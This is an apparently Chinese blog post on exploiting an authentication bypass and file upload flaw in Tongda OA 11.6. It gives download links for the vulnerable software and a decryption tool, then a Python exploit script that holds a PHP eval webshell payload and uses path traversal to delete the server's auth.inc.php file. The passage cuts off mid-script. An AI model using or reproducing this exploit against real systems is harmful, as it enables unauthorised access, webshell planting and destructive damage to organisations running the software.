通达OA11.6身份验证绕过+文件上传

最新推荐文章于 2024-06-26 17:24:11 发布

原创

最新推荐文章于 2024-06-26 17:24:11 发布 · 1.4k 阅读

0 ·

CC 4.0 BY-SA版权

环境安装

11.6OA
链接：https://pan.baidu.com/s/1tmqpaq5NnY3edshJExxqQg 
提取码：z33a 
源码解密工具
链接：https://pan.baidu.com/s/1LbdVhaVInbMxQoAM4g4VKg 
提取码：nrtw

漏洞利用

import requests
target="http://192.168.202.151"
payload="<?php @eval($_REQUEST[777])?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")

url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("